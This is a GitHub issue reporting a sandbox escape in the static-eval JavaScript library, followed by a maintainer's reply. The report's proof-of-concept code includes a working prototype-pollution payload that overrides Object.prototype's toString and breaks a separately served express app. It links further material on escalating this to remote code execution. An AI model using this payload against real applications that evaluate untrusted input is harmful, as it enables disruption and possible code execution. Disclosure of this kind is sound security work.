Sandbox Escape - Githubissues

browserify / static-eval

evaluate statically-analyzable expressions

MIT License

175 stars 27 forks source link

Sandbox Escape #32

Open po6ix opened 4 years ago

po6ix commented 4 years ago

poc

// make pollution
const evaluate = require('static-eval');
const parse = require('esprima').parse;

var src = `({})['__proto__']['__defineGetter__']('toString', ({})['constructor'])`
var ast = parse(src).body[0].expression;

evaluate(ast);

// serve webapp
const express = require('express');
const app = express();

app.get('/', (req, res) => {
    res.end('working!');
});

app.listen(8080);

details in https://blog.p6.is/bypassing-a-js-sandbox/#Prototype-Pollution-to-Remote-Code-Execution

goto-bus-stop commented 4 years ago

Thanks for the report! As the readme says we don't encourage people to use static-eval on untrusted input because of things like this, there are probably many more undiscovered ways too :sweat_smile:

I'll see if there is a simple fix for this, anyway, but it's not the highest priority.